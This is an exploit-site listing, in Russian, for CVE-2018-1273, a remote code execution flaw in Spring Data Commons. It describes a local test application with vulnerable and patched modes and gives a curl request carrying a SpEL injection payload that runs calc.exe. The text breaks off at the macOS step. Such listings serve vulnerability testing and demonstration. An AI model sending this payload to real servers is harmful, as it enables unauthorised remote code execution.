Sploitus

Exploit for CVE-2018-1273

kitploit · 2026-08-25

Exploit Code

MARKDOWN51 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-HDGOKANI-CVE-2018-1273
# CVE-2018-1273

Spring Data Commons, версии до 1.13 до 1.13.10, от 2.0 до 2.0.5 и более старые неподдерживаемые версии, содержат уязвимость связывания свойств, вызванную неправильной нейтрализацией специальных элементов. Неаутентифицированный удаленный злоумышленник может передать специально созданные параметры запроса к HTTP-ресурсам на основе Spring Data REST или использовать привязку полезной нагрузки запроса на основе проекций Spring Data, что может привести к удаленному выполнению кода.

Подробнее здесь

# Запуск

Приложение можно протестировать с уязвимой или исправленной версией Spring Data Commons.

  * Уязвимая версия (по умолчанию):



root@kitploit:~
    
    
    mvn spring-boot:run
    

  * Исправленная версия:



root@kitploit:~
    
    
    mvn spring-boot:run -Dfixed
    

# Проверка уязвимости

Выполните следующую команду, чтобы проверить, можно ли эксплуатировать уязвимость:

  * На Windows:



root@kitploit:~
    
    
    curl -X POST http://localhost:8080/account -d "name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('calc.exe')]=123"
    
    

  * На macOS:



root@kitploit:~